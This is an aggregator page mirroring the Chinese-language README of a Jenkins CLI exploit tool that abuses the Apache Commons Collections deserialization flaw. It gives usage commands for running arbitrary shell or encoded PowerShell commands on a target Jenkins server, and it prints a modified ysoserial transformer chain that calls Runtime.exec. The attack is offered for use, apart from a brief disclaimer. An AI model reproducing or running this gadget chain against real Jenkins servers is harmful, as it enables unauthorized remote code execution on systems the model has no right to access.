GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → CaledoniaProject → Jenkins Cli Exploit

CaledoniaProject / Jenkins Cli Exploit

Jenkins CommonCollections Exploit

Programming Languages

perl
6916 projects

漏洞详情

http://tools.changesec.com/Jenkins-CommonCollections-Exploit/

jenkins-cli-exploit

花时间学了一下 transformer,这个版本支持任意命令!

安装环境

cpan IPC::Run

利用方法

./client.pl --url http://127.0.0.1:8080/jenkins/ --os linux --cmd '{ whoami; ls -lh; } > /tmp/hacked'
./client.pl --url http://127.0.0.1:8080/jenkins/ --os win --cmd 'powershell -ep bypass -enc xxxxx'

来个截图,

截图

源代码

官方的 ysoserial 实现存在缺陷,不能正确执行任意命令,已经改掉,现在支持两个新的 Collection,

分别为,

CommonsCollections1Linux
CommonsCollections1Win

修改点,你懂的,

		final String[] execArgs = new String[] { "sh", "-c", command };
		// inert chain for setup
		final Transformer transformerChain = new ChainedTransformer(
			new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer("getMethod", new Class[] {
					String.class, Class[].class }, new Object[] {
					"getRuntime", new Class[0] }),
				new InvokerTransformer("invoke", new Class[] {
					Object.class, Object[].class }, new Object[] {
					null, new Object[0] }),
				new InvokerTransformer("exec",
					new Class[] { String[].class }, new Object[] {
                        execArgs }),
				new ConstantTransformer(1) };

代码懒得上传了,直接用lib的就可以

Legal Disclaimer

Using this tool is legit but hacking may not be. The author does not take any responsibility for such activities.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].